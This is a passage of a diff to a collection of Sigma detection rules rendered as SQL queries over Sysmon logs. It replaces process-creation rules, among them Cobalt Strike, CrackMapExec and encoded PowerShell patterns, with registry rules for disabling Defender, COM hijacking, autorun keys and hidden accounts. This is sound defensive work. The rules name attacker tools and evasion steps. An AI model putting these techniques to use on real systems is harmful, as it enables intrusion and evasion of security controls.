"7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 
19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "status": "experimental", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", - "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Other programs that cause these patterns (please 
report)" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", - "status": "test", - "description": "Detects 
the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1574.001" + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE 
'%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "title": "Potential PowerShell Execution Policy Tampering", + "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_powershell_execution_policy.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Wow6432Node CurrentVersion Autorun Keys Modification", + "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT 
((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package 
Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1564.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Unusually Long PowerShell CommandLine", - "id": 
"d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", - "status": "test", - "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", - "author": "oscd.community, Natalia Shornikova", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.dll' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in 
order to bypass controlled folder settings", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND 
CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": 